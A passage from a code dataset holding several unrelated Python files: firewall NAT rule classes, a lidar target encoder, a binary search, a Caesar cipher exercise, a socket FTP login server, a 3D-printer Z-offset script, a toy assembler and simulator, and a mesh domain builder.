This is\n    typically used for outbound traffic where you need to hide the original\n    source address.\n\n    Example of changing an existing source NAT rule to use a different source\n    NAT address::\n\n        for rule in policy.fw_ipv4_nat_rules.all():\n            if rule.name == 'sourcenat':\n                rule.static_src_nat.translated_value = '10.10.50.50'\n                rule.save()\n\n    \"\"\"\n    typeof = 'static_src_nat'\n\n\nclass StaticDestNAT(NATElement):\n    \"\"\"\n    Destination NAT provides the ability to translate the destination address\n    to a specified location. The NAT rule's destination field will be the\n    match and the static destination nat address defines how the request is\n    rewritten.\n\n    Example of changing an existing NAT rule to use a different NAT destination\n    and map port 80 to 8080::\n\n        for rule in policy.fw_ipv4_nat_rules:\n            if rule.name == 'destnat':\n                rule.static_dst_nat.translated_value = '30.30.30.30'\n                rule.static_dst_nat.translated_ports = (80, 8080)\n                rule.save()\n\n    \"\"\"\n    typeof = 'static_dst_nat'\n\n    @property\n    def translated_ports(self):\n        \"\"\"\n        Translated ports for destination NAT can be either single source\n        to single destination port, or ranges of ports to translate.\n        The format for single ports is: (source_port, destination_port),\n        or (80, 443) - translate source port 80 to 443 (single ports can\n        also be in string format, i.e. ('80', '443')).\n        You can also use a range format, although the port ranges must\n        then match in size. The format for a range of ports is:\n        ('80-100', '6000-6020') - port 80 translates to 6000, etc.\n\n        :param tuple value: (source_port/s, destination_port/s)\n        :raises ValueError: Invalid tuple format for port definition\n        :return tuple value: ports used for destination PAT\n        \"\"\"\n        orig_value = self.get(self.typeof, {}).get('original_value')\n        tran_value = self.get(self.typeof, {}).get('translated_value')\n        \n        if not orig_value or not tran_value:\n            return None\n        \n        sport = extract_ports(orig_value)\n        dport = extract_ports(tran_value)\n        return ('-'.join(sport), '-'.join(dport))\n\n    @translated_ports.setter\n    def translated_ports(self, value):\n        if not isinstance(value, tuple) or len(value) != 2:\n            raise ValueError(\"Input must be tuple and length 2\")\n        \n        sport, dport = map(str, value)\n        \n        p = self.setdefault(self.typeof, {})\n        p.setdefault('original_value', {}).update(add_ports(sport))\n        p.setdefault('translated_value', {}).update(add_ports(dport))\n    \n\ndef extract_ports(value_dict):\n    \"\"\"\n    Extract min/max ports from NAT config\n    \"\"\"\n    seen = []\n    keys = ('min_port', 'max_port')\n    for key in keys:\n        if value_dict.get(key) not in seen:\n            seen.append(value_dict[key])\n    return map(str, seen)\n\n\ndef add_ports(value_str):\n    \"\"\" \n    Add min/max ports to NAT config\n    \"\"\"\n    if '-' in value_str:\n        port_min, port_max = value_str.split('-')\n        return {'min_port': port_min,\n                'max_port': port_max}\n    \n    else:\n        return {'min_port': value_str,\n                'max_port': value_str}\n\n    \n    \nclass IPv4NATRule(RuleCommon, NATRule, SubElement):\n    \"\"\"\n    Create NAT Rules for relevant policy types. Rule requirements are \n    similar to a normal rule with the exception of the NAT field and no action\n    field. 
\n\n Like policy rules, specifying source/destination and services can be\n done either using the element href or element defined in element classes\n defined under package ``smc.elements``.\n For example, using networks from :py:class:`smc.elements.network` or \n services from :py:class:`smc.elements.service`.\n\n Example of creating a dynamic source NAT for host 'kali'::\n\n policy = FirewallPolicy('smcpython')\n policy.fw_ipv4_nat_rules.create(name='mynat', \n sources=[Host('kali')], \n destinations='any', \n services='any', \n dynamic_src_nat='1.1.1.1', \n dynamic_src_nat_ports=(1024,65535))\n\n\n Example of creating a static source NAT for host 'kali'::\n\n policy.fw_ipv4_nat_rules.create(name='mynat', \n sources=[Host('kali')], \n destinations='any', \n services='any', \n static_src_nat='1.1.1.1')\n\n Example of creating a destination NAT rule for destination host '3.3.3.3'\n with destination translation address of '1.1.1.1'::\n\n policy.fw_ipv4_nat_rules.create(name='mynat', \n sources='any', \n destinations=[Host('3.3.3.3')], \n services='any', \n static_dst_nat='1.1.1.1')\n\n Destination NAT with destination port translation::\n\n policy.fw_ipv4_nat_rules.create(name='aws_client', \n sources='any', \n destinations=[Alias('$$ Interface ID 0.ip')], \n services='any', \n static_dst_nat='1.1.1.1', \n static_dst_nat_ports=(2222, 22),\n used_on=engine.href)\n\n Create an any/any no NAT rule from host 'kali'::\n\n policy.fw_ipv4_nat_rules.create(name='nonat', \n sources=[Host('kali')], \n destinations='any', \n services='any')\n\n \"\"\"\n typeof = 'fw_ipv4_nat_rule'\n\n def create(self, name, sources=None, destinations=None, services=None,\n dynamic_src_nat=None, dynamic_src_nat_ports=(1024, 65535),\n static_src_nat=None, static_dst_nat=None,\n static_dst_nat_ports=None, is_disabled=False, used_on=None,\n add_pos=None, after=None, before=None, comment=None):\n \"\"\"\n Create a NAT rule.\n\n When providing sources/destinations or services, you can provide the\n element href, network element or services from ``smc.elements``.\n You can also mix href strings with Element types in these fields. \n\n :param str name: name of NAT rule\n :param list sources: list of sources by href or Element\n :type sources: list(str,Element)\n :param list destinations: list of destinations by href or Element\n :type destinations: list(str,Element)\n :param list services: list of services by href or Element\n :type services: list(str,Element)\n :param dynamic_src_nat: str ip or Element for dest NAT\n :type dynamic_src_nat: str,Element\n :param tuple dynamic_src_nat_ports: starting and ending ports for PAT.\n Default: (1024, 65535)\n :param str static_src_nat: ip or element href of used for source NAT\n :param str static_dst_nat: destination NAT IP address or element href\n :param tuple static_dst_nat_ports: ports or port range used for original\n and destination ports (only needed if a different destination port\n is used and does not match the rules service port)\n :param bool is_disabled: whether to disable rule or not\n :param str used_on: href or Element (of security engine) where this\n NAT rule applies, Default: Any\n :type used_on: str,Element\n :param int add_pos: position to insert the rule, starting with position 1. If\n the position value is greater than the number of rules, the rule is inserted at\n the bottom. If add_pos is not provided, rule is inserted in position 1. Mutually\n exclusive with ``after`` and ``before`` params.\n :param str after: Rule tag to add this rule after. 
Mutually exclusive with ``add_pos``\n and ``before`` params.\n :param str before: Rule tag to add this rule before. Mutually exclusive with ``add_pos``\n and ``after`` params.\n :param str comment: optional comment for the NAT rule\n :raises InvalidRuleValue: if rule requirements are not met\n :raises CreateRuleFailed: rule creation failure\n :return: newly created NAT rule\n :rtype: IPv4NATRule\n \"\"\"\n rule_values = self.update_targets(sources, destinations, services)\n rule_values.update(name=name, comment=comment)\n rule_values.update(is_disabled=is_disabled)\n\n options = LogOptions()\n\n if dynamic_src_nat:\n nat = DynamicSourceNAT(options)\n nat.translated_value = dynamic_src_nat\n nat.translated_ports = (dynamic_src_nat_ports)\n options.update(nat.data)\n rule_values.update(options=options.data)\n \n elif static_src_nat:\n nat = StaticSourceNAT(options)\n nat.translated_value = static_src_nat\n nat.original_value = sources[0].href\n options.update(nat.data)\n rule_values.update(options=options.data)\n\n if static_dst_nat:\n destinations = rule_values['destinations']\n if 'any' in destinations or 'none' in destinations:\n raise InvalidRuleValue('Destination field cannot be none or any for '\n 'destination NAT.')\n destination = Destination()\n destination.add_many(destinations.get('dst'))\n \n nat = StaticDestNAT(options)\n nat.translated_value = static_dst_nat\n nat.original_value = destination.all_as_href()[0]\n if static_dst_nat_ports:\n nat.translated_ports = static_dst_nat_ports\n options.update(nat.data)\n rule_values.update(options=options.data)\n \n if 'options' not in rule_values: # No NAT\n rule_values.update(options=options.data)\n\n rule_values.update(used_on=used_on)\n \n params = None\n href = self.href\n if add_pos is not None:\n href = self.add_at_position(add_pos)\n elif before or after:\n params = self.add_before_after(before, after)\n \n return SubElementCreator(\n self.__class__,\n CreateRuleFailed,\n href=href,\n params=params,\n json=rule_values)\n\n\nclass IPv6NATRule(IPv4NATRule):\n \"\"\"\n Represents an IPv6 NAT rule. Source and/or destination (depending on\n NAT type) should be an IPv6 address. 
It is possible to submit\n    an IPv4 address; however, the policy validation engine will fail when\n    the policy is deployed to an engine, and the rule will be ignored.\n    \"\"\"\n    typeof = 'fw_ipv6_nat_rule'\n","sub_path":"smc/policy/rule_nat.py","file_name":"rule_nat.py","file_ext":"py","file_size_in_byte":18904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"83388157","text":"import numpy as np\nimport cv2\nfrom data.data_utils.velodyne_points import *\nfrom utils.utils import *\nimport math\nimport os\nimport tensorflow as tf\nfrom data.data_utils.data_reader import *\n\n\ndef get_target(labels, truncated, occlusion, anchors=np.array([3.9, 1.6, 1.5]), input_size=(448, 512), output_size=(112, 128, 35)):\n    ratio = input_size[0] // output_size[0]\n    ratio = 1  # NOTE: the computed ratio is deliberately overridden here\n    y_target = np.zeros((output_size[0], output_size[1], 2, 13), np.float32)\n    for i in range(len(labels)):\n        label_i = np.array(labels[i])\n\n        x = int(label_i[0]/ratio)\n        y = int(label_i[1]/ratio)\n\n        if x >= output_size[0]:\n            x = output_size[0] - 1\n        if y >= output_size[1]:\n            y = output_size[1] - 1\n\n        if x < 0 or y < 0:\n            continue\n\n        # label_i[0:2] = label_i[0:2] / (ratio*1.0)\n        label_i[2] = label_i[2] / (output_size[2]*1.)\n        ang = label_i[6]\n\n        if ang < 0:\n            dir_ = 0\n        else:\n            dir_ = 1\n        while ang < 0:\n            ang += np.pi\n        k = 0\n        if (ang > np.pi/4 and ang < (3/4.)* np.pi) or (ang < -np.pi/4 and ang > -(3./4.)* np.pi):\n            k = 1\n\n        if ang > (3./4.) * np.pi:\n            ang -= np.pi\n        label_i[6] = ang - k * (np.pi/2)\n        label_i = np.append(label_i, [dir_])\n        # label_i[6:8] = [math.sin(ang), math.cos(ang)]\n        \n        anchor = np.array([x+0.5, y+0.5, 0.5, anchors[0], anchors[1], anchors[2]])\n        \n        label_i[:3] = (label_i[:3] - anchor[:3]) \n        label_i[3:6] = np.log(label_i[3:6])\n\n        # mins = np.array([-0.5, -0.5, 0, 0.8, 0.3, 0.13, -1.1, -1.1])\n        # maxs = np.array([0.5, 0.5, 1, 2.6, 1.4, 0.82, 1.1, 1.1])\n        mins = np.array([0, 0, 0, -0.1, -0.1, -0.1, -1.1, -1.1])\n        maxs = np.array([0, 0, 0, 3, 2, 2, 1.1, 1.1])\n        \n        label_i[3:6] = ((label_i[3:6] - mins[3:6]) / (maxs[3:6]-mins[3:6])) * 2 - 1\n        z = [0, 0, 0, 0]\n        z[occlusion[i]] = 1\n\n        y_target[x, y, k, :8] = label_i\n        y_target[x, y, k, 8:9] = [1]\n        y_target[x, y, k, 9:13] = z\n    \n    return y_target","sub_path":"src/data/data_utils/target_utils.py","file_name":"target_utils.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"428761220","text":"\"\"\"Binary search algorithm module\"\"\"\n\nfrom typing import Iterable\n\n\ndef bsearch(array: Iterable[int], value: int):\n    \"\"\"Binary search algorithm function\n    array - the array where the search is performed\n    value - what we are looking for\n    return: value index\n    \"\"\"\n    if not array or value is None:\n        raise ValueError\n    array = list(array)\n    low = 0\n    height = len(array) - 1\n    result = None\n    while low <= height:\n        center = low + (height - low) // 2\n        print(height, low, center)\n        if value < array[center]:\n            height = center - 1\n        elif value > array[center]:\n            low = center + 1\n        else:\n            result = center\n            break\n    return result\n","sub_path":"bsearch.py","file_name":"bsearch.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"466483158","text":"text = input().lower()\niteration = int(input())\n# print(ord('a'))   letters to numbers\n# print(chr(97), chr(122))   numbers to letters\n\ndef crypting(text, iteration):\n    crypting = ''\n\n    
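# shift each letter by the offset, wrapping within the alphabet; spaces pass through unchanged\n    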
for i in text:\n        if i == ' ':\n            crypting += ' '\n            continue\n        \n        number = ord(i)\n        number += iteration\n\n        if number < 97:\n            number += 26\n        elif number > 122:\n            number -= 26\n\n        crypting += chr(number)\n    return crypting\n\ntotal = crypting(text, -iteration)\n\nprint(total.upper())\n","sub_path":"task-III-3-1.py","file_name":"task-III-3-1.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"491003662","text":"#!/usr/bin/env python3\n# -*- coding=utf-8 -*-\n\"\"\"\n@author:Wllen\n@file:main.py\n@time:2018/8/3 22:48\n\"\"\"\nimport socket\nimport os\nimport struct\nimport json\nfrom conf import settings\nfrom core import auth\n\n\nclass MyServer:\n    addr_family = socket.AF_INET  # IPv4 networking\n    socket_type = socket.SOCK_STREAM  # TCP protocol\n    allow_reuse_address = False\n    coding = \"utf-8\"\n\n    def __init__(self, server_addr, bind_and_activate=True):\n        self.server_addr = server_addr\n        self.socket = socket.socket(self.addr_family, self.socket_type)\n\n        if bind_and_activate:\n            try:\n                self.server_bind()\n                self.server_activate()\n            except:\n                self.server_close()\n                raise\n\n    def server_bind(self):\n        \"\"\"Bind the server IP and port, and handle port reuse\"\"\"\n        if self.allow_reuse_address:\n            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n            # setsockopt(level, optname, value)\n            # level selects which option group is used; usually SOL_SOCKET,\n            # meaning options of the socket currently in use.\n            # SO_REUSEADDR: once a socket is closed, the local port it used can be\n            # reused immediately. Normally the port can only be reused after a\n            # system-defined timeout.\n            # Setting value to 1 marks SO_REUSEADDR as TRUE, so the OS releases the\n            # server's port right after the server socket is closed or the server\n            # process terminates, instead of holding it for several minutes.\n        self.socket.bind(self.server_addr)\n        self.server_addr = self.socket.getsockname()\n\n    def server_activate(self):\n        \"\"\"Set how many connections may be queued; without concurrency only one is served, the rest wait\"\"\"\n        self.socket.listen(settings.REQUEST_QUEUE_SIZE)\n\n    def server_close(self):\n        \"\"\"Close the socket\"\"\"\n        self.socket.close()\n\n    def get_request(self):\n        return self.socket.accept()\n\n    def close_request(self, request):\n        request.close()\n\n    def run(self):\n        \"\"\"Run the server loop\"\"\"\n        while True:\n            self.conn, self.client_addr = self.get_request()\n            print(\"client address:\", self.client_addr)\n            while True:\n                try:\n                    user_struct = self.conn.recv(4)\n                    if not user_struct: break\n                    user_len = struct.unpack(\"i\", user_struct)[0]\n                    user_json = self.conn.recv(user_len).decode(self.coding)\n                    user_dic = json.loads(user_json)\n                    print(user_dic)\n                    user_data = auth.login(user_dic)\n                    print(\"user_data\", user_data)\n                    if user_data['auth_status'] == 0:\n                        self.conn.send(\"400\".encode(self.coding))  # 400: authentication passed\n                    if user_data['auth_status'] == 1:\n                        print('wrong password')\n                        self.conn.send(\"401\".encode(self.coding))  # 401: wrong password\n                    if user_data['auth_status'] == 2:\n                        print('user does not exist')\n                        self.conn.send(\"402\".encode(self.coding))  # 402: username does not exist\n\n\n\n                    # head_struct = self.conn.recv(4)\n                    # head_len = struct.unpack(\"i\", head_struct)[0]\n                    # head_json = self.conn.recv(head_len).decode(self.coding)\n                    # head_dic = json.loads(head_json)\n                    # print(head_dic)\n                    #\n                    # cmd = head_dic['cmd']\n                    # if hasattr(self, cmd):  # dispatch by reflection\n                    #     func = getattr(self, cmd)\n                    #     func(head_dic)\n                except Exception:\n                    break\n\n\ndef entrance():\n    servers = MyServer(('127.0.0.1', 8082))\n    servers.run()\n","sub_path":"study/module3/homework2/FTP/FtpServer/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"499514137","text":"from OpenFL import FLP, Printer\r\np=Printer.Printer()\r\n\r\n
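# Assumes an OpenFL-compatible Form 1/1+ printer is connected.\r\n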
# Initialize first - it seems to increase the success rate of the script.\r\n# Initializing stops any operations that are currently running,\r\n# and re-homes the Z and tilt motors.\r\nprint (\"initializing\")\r\np.initialize()\r\n\r\n# This adds a Z Offset. User will be prompted for an offset value.\r\n# Positive values = build plate closer to vat\r\n# Negative values = build plate further from vat\r\nprint (\"Z offset.\")\r\nprint (\"Positive = down, negative = up\")\r\nx = 0\r\nwhile x == 0:\r\n    ZoffsetMirrored = raw_input(\"Enter Z Offset OR Press Enter to Skip:\")\r\n    try:\r\n        if ZoffsetMirrored != \"\":\r\n            print (\"Z Offset will be set to \" + str(ZoffsetMirrored))\r\n            Zoffset = (float(ZoffsetMirrored) * (-400.0))\r\n            print (\"saving Z Offset to printer\")\r\n            blockNum = 0\r\n            layer = p.read_block_flp(blockNum)\r\n            layer[16] = FLP.ZMove(int(-66924 + Zoffset))\r\n            p.write_block(blockNum, layer)\r\n            x = 1\r\n        else:\r\n            x = 1\r\n    except ValueError:\r\n        print (\"You must enter a number or press Enter to continue\")\r\n        continue\r\nif ZoffsetMirrored != \"\":\r\n    print(\"Z Offset Set To \" + ZoffsetMirrored)\r\nelse:\r\n    print(\"Z Offset Unchanged Because You Chose to Skip\")\r\np.initialize()\r\nexit()\r\n","sub_path":"Community-PythonScripts/Scripts/Deprecated Scripts/ZOffset.py","file_name":"ZOffset.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"299582895","text":"import sys\nimport re\n\nBRANCH_OPS = ['beq', 'bne', 'blt', 'bge']\nALU_OPS = ['sub','subc', 'dec', 'ior', 'or', 'and', 'xor', 'add', 'mov', 'com', 'inc', 'decs', 'lsr', 'lsl', 'clr', 'swap', 'incs']\nLS_OPS = ['lw', 'sw']\nMISC_OPS = ['cmp', 'cmpz', 'cmpc', 'halt', 'setq', 'jumpq', 'rrc', 'rlc', 'setfp', 'cplc', 'clrc']\n\nclass Processor:\n\n    def __init__(self, instructions, mem=[]):\n        # Initialize all registers\n        self.instructions = instructions\n        self.memory = [0]*256\n        self.PC = 0\n        self.regs = [0, 0, 0, 0]\n        self.W = 0\n        self.FP = 0\n        self.Z_flag, self.C_flag = False, False\n\n        # Copy the initial memory to our array\n        for i in range(len(mem)):\n            self.memory[i] = mem[i]\n\n    def preprocess(self):\n        # Sweep through the list of instructions, removing\n        # comments and blank lines and replacing GOTO labels\n        # with line numbers.\n        labels = dict()\n        lines = []\n\n        # First pass: get all labels, remove non-instructions from code\n        for instr in self.instructions:\n            # Remove commented code from line\n            line = instr.lower().split('#')[0]\n            if re.match(\"^.*:\", line) is not None:\n                # If line is a label, add label to dictionary\n                label = line.split(':')[0]\n                labels[label] = len(lines) - 1\n                continue\n            # Convert jump into setq+jumpq\n            if line.startswith(\"jump \"):\n                lines.append(\"setq \" + line.split(\"jump \")[1])\n                lines.append(\"jumpq\")\n                continue\n            # Add line to list of lines\n            if line.strip() != \"\":\n                lines.append(line)\n        \n        # Second pass: replace labels with line numbers\n        for i in range(len(lines)):\n            tokens = lines[i].split()\n            if tokens[-1] in labels.keys():\n                # If mnemonic is a setq, we just add the label destination\n                if tokens[0] == 'setq':\n                    lines[i] = 'setq ' + str(labels[tokens[-1]])\n                elif tokens[0].lower() in BRANCH_OPS:\n                    offset = labels[tokens[-1]] - i\n                    lines[i] = tokens[0] + ' ' + str(offset)\n        \n        # Replace instructions with new instructions\n        self.instructions = lines\n    \n    def assemble_single(self, instr):\n        bit_string = \"\"\n        ops = instr.replace('$', '').replace(',', '').split()\n        # Helper function to convert integer to fixed-width binary\n        binary = lambda x, width: 
format(x, '0{0}b'.format(width))\n\n # Translate instruction according to instruction type\n op = ops[0]\n if op == 'setq':\n # Ensure that literal value is between 0 and 127\n literal = int(ops[1])\n assert literal < 128 and literal >= 0, \"Literal value {0} out of range\".format(literal)\n bit_string = '11' + binary(literal, 7)\n\n elif op in BRANCH_OPS:\n # Add opcode and function code for operation\n bit_string += '10'\n bit_string += {\n 'beq': '00',\n 'bne': '01',\n 'blt': '10',\n 'bge': '11'\n }.get(op, None)\n # Ensure that literal value is between 0 and 31\n offset = int(ops[1])\n assert offset < 32 and offset >= 0, \"Offset value {0} out of range\".format(offset)\n bit_string += binary(offset, 5)\n\n elif op in ALU_OPS:\n # Replace mov ## q/f with movq/movf ##\n if op == 'mov':\n op += ops[2]\n # Add opcode and function code for operation\n bit_string += '00'\n bit_string += {\n 'sub': '0010',\n 'dec': '0011',\n 'ior': '0100',\n 'and': '0101',\n 'xor': '0110',\n 'add': '0111',\n 'movq': '1000',\n 'com': '1001',\n 'inc': '1010',\n 'movf': '1011',\n 'lsl': '1100',\n 'clr': '1101',\n 'lsr': '1110',\n 'subc': '1111'\n }.get(op, None)\n\n # Add destination bit for F or Q\n dest = ops[2]\n assert dest == 'f' or dest == 'q', \"Invalid destination bit {0}\".format(dest)\n bit_string += '0' if dest =='q' else '1'\n # Ensure that literal value is between 0 and 3\n register = int(ops[1])\n assert register < 4 and register >= 0, \"Register value {0} out of range\".format(register)\n bit_string += binary(register, 2)\n\n elif op in LS_OPS:\n bit_string += '01'\n bit_string += '0' if op == 'lw' else '1'\n # Ensure that literal value is between 0 and 8\n offset = int(ops[2])\n assert offset < 16 and offset >= 0, \"Offset value {0} out of range\".format(offset)\n bit_string += binary(offset, 4)\n # Ensure that literal value is between 0 and 3\n register = int(ops[1])\n assert register < 4 and register >= 0, \"Register value {0} out of range\".format(register)\n bit_string += binary(register, 2)\n\n elif op in MISC_OPS:\n bit_string += '00'\n bit_string += {\n 'halt': '0000000',\n 'jumpq': '0000001',\n 'rrc': '0000100',\n 'rlc': '0000101',\n 'cplc': '0000110',\n 'clrc': '0000111',\n 'cmpz': '00010',\n 'cmpc': '00011'\n }.get(op, None)\n # Add register for CMPZ or CMPC\n if op == 'cmpz' or op == 'cmpc':\n # Ensure that literal value is between 0 and 3\n register = int(ops[1])\n assert register < 4 and register >= 0, \"Register value {0} out of range\".format(register)\n bit_string += binary(register, 2)\n\n assert len(bit_string) == 9, \"Assembler error on instruction '{0}' translated as {1}\".format(instr, bit_string)\n #print(bit_string, ' ', instr)\n return bit_string\n\n def assemble(self, filename):\n # Transform instructions into a list of 9-bit binary strings\n self.preprocess()\n bitstr_iter = map(self.assemble_single, self.instructions)\n\n # Print each 9-bit string to file \n with open(filename, 'w') as fout:\n for bitstr in bitstr_iter:\n fout.write(bitstr + '\\n')\n\n def __repr__(self):\n if self.PC < len(self.instructions):\n instr = self.instructions[self.PC]\n instr = instr.split('#')[0]\n # If instruction is \"print\", output memory to stderr\n if instr == \"print\":\n pass #sys.stderr.write(str(self.memory[16:22]) + '\\n')\n else:\n instr = \"---------\"\n return instr\n return \"Instr: {:12s}PC {:03d}, Inst: {:}, Q: {:02x}, R0: {:02x}, R1: {:02x}, R2: {:02x}, R3: {:02x}, Z: {:02x}, C: {:02x}\".format(\n instr,\n self.PC,\n self.assemble_single(instr),\n self.W,\n self.regs[0],\n 
self.regs[1],\n self.regs[2],\n self.regs[3],\n self.Z_flag,\n self.C_flag\n )\n #return \"PC: {0}\\tInst: {1}\\tRegs: {2}\\tQ: {3}\\tC: {4}\\tZ: {5}\".format(\n # self.PC, instr, self.regs, self.W, self.C_flag, self.Z_flag)\n\n def run_all(self, log='END'):\n self.preprocess()\n while self.PC < len(self.instructions):\n if log == 'EVERY':\n print(self)\n self.run()\n if log != 'NONE':\n print(self)\n print(\"Memory:\\n\", self.memory[:24])\n\n def run(self):\n # Get the operations and operands from the instruction\n instr = self.instructions[self.PC].lower()\n instr = instr.split('#')[0]\n ops = instr.replace('$', '').replace(',', '').split()\n\n # Skip empty lines or comments\n if len(ops) == 0 or ops[0].startswith('#'):\n self.PC += 1\n return\n\n # Call a helper function for the particular instruction type\n op = ops[0]\n if op in BRANCH_OPS:\n self.run_branch(ops)\n elif op in ALU_OPS:\n self.run_alu(ops)\n elif op in LS_OPS:\n self.run_ls(ops)\n elif op in MISC_OPS:\n self.run_misc(ops)\n\n # Update the program counter, even if we branched \n self.PC += 1\n\n def run_branch(self, ops):\n op, offset = ops[0], int(ops[1])\n if ((op == 'beq' and self.Z_flag == True) or\n (op == 'bne' and self.Z_flag == False) or\n (op == 'blt' and self.C_flag == True) or\n (op == 'bge' and self.C_flag == False)):\n \n # Update the program counter\n self.PC += offset\n\n def run_alu(self, ops):\n op, reg, dest = ops[0], int(ops[1]), ops[2]\n f = self.regs[reg]\n result = None\n if op == 'sub':\n result = f - self.W\n self.C_flag = result < 0\n result %= 256\n if op == 'subc':\n result = f - self.W\n if self.C_flag == False:\n self.C_flag = result < 0\n result %= 256\n print(\"subc \", result)\n if op == 'dec':\n result = f - 1\n if op == 'or' or op == 'ior':\n result = f | self.W\n if op == 'and':\n result = f & self.W\n self.C_flag = result > 255\n result = result % 256\n if op == 'xor':\n result = f ^ self.W\n if op == 'add':\n result = f + self.W\n self.C_flag = result > 255\n result %= 256\n if op == 'mov':\n result = f if dest == 'q' else self.W\n if op == 'com':\n result = ~f % 256\n if op == 'inc':\n result = (f + 1) % 256\n if op == 'decs':\n result = (f - 1) % 256\n self.PC += 1\n if op == 'lsl':\n result = f << 1\n self.C_flag = result > 255\n result = result % 256\n if op == 'lsr':\n self.C_flag = f & 1 != 0\n result = f >> 1\n if op == 'clr':\n result = 0\n if op == 'swap':\n result = f << 4 | f >> 4\n if op == 'incs':\n result = f + 1\n self.PC += 1\n \n # Store result of ALU operation to destination,\n # which is W if d == 0 otherwise f\n if dest == 0 or dest == 'q':\n self.W = result\n else:\n self.regs[reg] = result\n\n def run_ls(self, ops):\n op, reg, offset = ops[0], int(ops[1]), int(ops[2])\n if op == 'lw':\n # Load value from memory into accumulator\n self.W = self.memory[self.regs[reg] + offset]\n print(self.memory[:8])\n elif op == 'sw':\n # Store value from accumulator into memory\n self.memory[self.regs[reg] + offset] = self.W\n print(self.memory[:8])\n\n def run_misc(self, ops):\n if ops[0] == 'cmp':\n print(\"Deprecated command, CMP\")\n if ops[0] == 'cmpc':\n f = self.regs[int(ops[1])]\n self.C_flag = f < self.W\n elif ops[0] == 'cmpz':\n f = self.regs[int(ops[1])]\n self.Z_flag = self.W == f\n elif ops[0] == 'halt':\n self.PC = len(self.instructions)\n elif ops[0] == 'setq':\n self.W = int(ops[1])\n elif ops[0] == 'jumpq':\n self.PC = self.W\n elif ops[0] == 'rlc':\n self.W = (self.W << 1) + (1 if self.C_flag else 0)\n self.C_flag = self.W > 255\n self.W %= 256\n elif ops[0] 
== 'rrc':\n new_carry = self.W & 1 == 1\n self.W = (self.W >> 1) + (128 if self.C_flag else 0)\n self.C_flag = new_carry\n elif ops[0] == 'setfp':\n self.FP = self.W\n elif ops[0] == 'cplc':\n self.C_flag = not (self.C_flag)\n print(\"invert\")\n elif ops[0] == 'clrc':\n self.C_flag = False\n\ndef test(filename, mem=[], log='EVERY'):\n with open(filename, 'r') as file:\n lines = [l.strip() for l in file]\n proc = Processor(lines, mem=mem)\n proc.run_all(log=log)\n return proc\n'''\ndef test_sqrt():\n results = dict()\n for n in range(65536):\n n1, n0 = n / 256, n % 256\n expected = int(n**0.5)\n mem = [0]*16 + [n1, n0]\n proc = test('squareroot.s9', mem=mem, log='END')\n results[n] = proc.memory[18]\n error = 0\n for input, actual in results.items():\n expected = input**0.5\n if abs(expected - actual) > 1:\n error += 1\n print(\"Input: {0}, Expected: {1}, Actual: {2}\".format(\n input, expected, actual\n ))\n print(\"Error: {0}/{1}\".format(error, len(results)))\n\ntest_sqrt()\n'''\nmem = [1, 129, 6, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 23, 112, 0]\nif len(sys.argv) == 1:\n print(\"Don't forget a filename!\")\nelif len(sys.argv) == 2:\n test(sys.argv[1], mem=mem)\nelif len(sys.argv) == 3:\n with open(sys.argv[1], 'r') as file:\n lines = [l.strip() for l in file]\n proc = Processor(lines, mem=mem)\n proc.assemble(sys.argv[2])\n","sub_path":"lab4/runasm.py","file_name":"runasm.py","file_ext":"py","file_size_in_byte":11608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"287063708","text":"import math\nfrom proteus import Domain\n\ndef beachBakhtyar3d(L=[8.5,1.0,0.8],\n Lb=3.5):\n boundaries=['left','right','bottom','top','front','back','obstacle']\n boundaryTags=dict([(key,i+1) for (i,key) in enumerate(boundaries)])\n vertices=[[0.0,0.0,0.0],#0\n [Lb,0.0,0.0],#1\n [L[0],0.0,0.5],#2\n [L[0],0.0,L[2]],#3\n [0.0,0.0,L[2]],#4\n [0.0,L[1],0.0],#5\n [Lb,L[1],0.0],#6\n [L[0],L[1],0.5],#7\n [L[0],L[1],L[2]],#8\n [0.0,L[1],L[2]]]#9\n vertexFlags=[boundaryTags['left'],#0\n boundaryTags['bottom'],#1\n boundaryTags['right'],#2\n boundaryTags['right'],#3\n boundaryTags['left'],#4\n boundaryTags['left'],#5\n boundaryTags['bottom'],#6\n boundaryTags['right'],#7\n boundaryTags['right'],#8\n boundaryTags['left']]#9\n facets=[[[0,1,2,3,4]],\n [[0,4,9,5]],\n [[2,3,8,7]],\n [[3,4,9,8]],\n [[0,1,6,5]],\n [[1,2,7,6]],\n [[5,6,7,8,9]]]\n facetFlags=[boundaryTags['front'],\n boundaryTags['left'],\n boundaryTags['right'],\n boundaryTags['top'],\n boundaryTags['bottom'],\n boundaryTags['bottom'],\n boundaryTags['back']]\n domain = Domain.PiecewiseLinearComplexDomain(vertices=vertices,\n vertexFlags=vertexFlags,\n facets=facets,\n facetFlags=facetFlags)\n #go ahead and add a boundary tags member \n domain.boundaryTags = boundaryTags\n return domain\n\nif __name__=='__main__':\n import os\n domain = beachBakhtyar3d()\n #domain.writeAsymptote(\"beachBakhtyar3d\")\n domain.writePoly(\"beachBakhtyar3d\")\n domain.writePLY(\"beachBakhtyar3d\")\n #os.system(\"asy -V beachBakhtyar3d\")\n","sub_path":"benchmarks/sacramentoLevee/beachBakhtyar3dDomain.py","file_name":"beachBakhtyar3dDomain.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"404652257","text":"import pandas as pd\nimport 
